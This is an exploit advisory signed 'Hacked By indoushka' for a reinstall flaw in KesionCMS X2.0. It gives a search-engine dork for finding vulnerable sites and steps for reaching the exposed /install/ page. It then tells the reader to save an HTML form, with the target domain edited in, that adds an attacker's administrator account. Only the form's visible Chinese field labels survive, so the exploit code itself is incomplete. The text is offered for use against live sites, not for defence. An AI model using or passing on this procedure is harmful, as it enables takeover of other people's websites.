Hacked By indoushka

==================================================================================================================================== | # Title : KesionCMS X2.0 Reinstall Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | | # Vendor : https://www.kesion.com/ | | # Dork : Powered by KesionCMS | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /install/index.asp [+] http://127.0.0.1.com/install/?action=s4 = add your information to login [+] copy & past this exploit listed below into a text file and save it with ".html" extension [+] Exploit : [+] @t Line 09 & 16 change the domain name of target Hacked By indoushka

网站参数配置

网站名称：* 如：Kesion官方站
网站域名：* 后面不要带“/”。如http://www.kesion.com。
安装目录：* 后面不要带“/”。系统会自动获取，建议不要修改。
授权码：免费版本用户请留空或填“0”。
后台目录：* 如：Manage,Admin，后面必须带"/"符号。
后台登录验证码：启用不启用
管理认证码：启用不启用认证码：

填写管理员信息

管理员账号：*
管理员密码：* 管理员密码不能为空
重复密码：

Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================